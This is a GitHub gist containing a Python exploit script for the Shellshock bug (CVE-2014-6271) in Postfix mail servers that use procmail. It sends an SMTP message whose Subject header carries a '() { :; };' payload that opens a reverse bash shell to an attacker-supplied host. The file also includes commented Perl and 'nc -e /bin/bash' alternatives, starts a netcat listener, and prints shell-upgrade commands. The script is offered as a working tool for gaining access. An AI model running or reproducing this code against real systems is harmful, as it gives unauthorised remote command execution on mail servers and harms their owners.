Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
This is a shell shock exploit for smtp Post fix versions. The old script had a preset sender name i have made this a variable so its easily changeable because without that if you ctrl+c in a tab it clogs up the name making it unable to recieve new shell without reverting. This should make it alot easier! I also included rlwrap dependency on netc…
#!/usr/bin/python
import sys,socket,subprocess
bnr = '''
#####################################################################################
# postfix + procmail + formail ShellShock Exploit #
# Tested on: Debian 5 (postfix smtp,procmail) #
# By 3mrgnc3 06/02/2017 #
# CVE : 2014-6271 #
# Initiates a Reverse TCP connection #
# refs: https://www.exploit-db.com/exploits/34896/ #
# https://gist.github.com/claudijd/33771b6c17bc2e4bc59c #
# https://github.com/3mrgnc3/pentest_old/blob/master/postfix-shellshock-nc.py #
#####################################################################################
'''
try:
target = sys.argv[1]
email = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
sender = sys.argv[5]
except IndexError:
print bnr + '[!] A valid user email address on the target is required\r\n[?] Useage: %s <target-ip> <valid-email_or_name> <lhost> <lport> <Sender_Name>\r\n' % sys.argv[0] + '-' * 80
sys.exit(1)
# reverse perl payload
#pld = '''perl -e 'use Socket;$i="''' + lhost + '''";$p=''' + lport + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' '''
# optional reverse python payload
pld = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + lhost + '''",''' + lport + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' '''
# optional netcat payload
#pld = 'nc ' + lhost + ' ' + lport + ' -e /bin/bash'
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print '#' * 55 + '\r\n[*] Connecting to target...'
s.connect((target,25))
s.recv(1024)
s.send('mail from:' + sender + '\r\n')
s.recv(1024)
s.send('rcpt to:<' + email + '>\r\n')
s.recv(1024)
s.send('data\r\n')
s.recv(1024)
s.send('To: <' + email + '>\r\nFrom: <' + email + '>\r\nSubject:() { :; };' + pld + '\r\nlove from 3mrgnc3\r\n\r\n.\r\nquit\r\n')
print "[*] Payload Sent.\r\n[*] Wait for incomming shell\r\n[!] To spawn an get out of a restricted shell"
print '''[!] Use: python -c 'import pty; pty.spawn("/bin/bash")'\r\n''' + '#'*55
print "reset"
print "export SHELL=bash"
print "export TERM=xterm-256color"
print "stty rows 25 columns 115"
print '*'*55
print "or if that doesnt work try"
print '*'*55
print '''[!] Use: python -c 'import pty; pty.spawn("/bin/bash")'\r\n'''
print "reset"
print "export SHELL=bash"
print "export TERM=xterm"
print "stty rows 25 columns 115"
print '#'*55
except:
print "[!] Can't connect to postfix Server! This means it is having an issue connect to the SMTP server..."
print "maybe use netcat to see if its online?"
lnr = "rlwrap -r -f . nc -s " + lhost + " -nlp " + lport
try:
ncl = subprocess.Popen(lnr, shell=True)
ncl.poll()
ncl.wait()
except:
print "\r[!] Shell Terminated! Do not use same sender name next time if using against same target"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment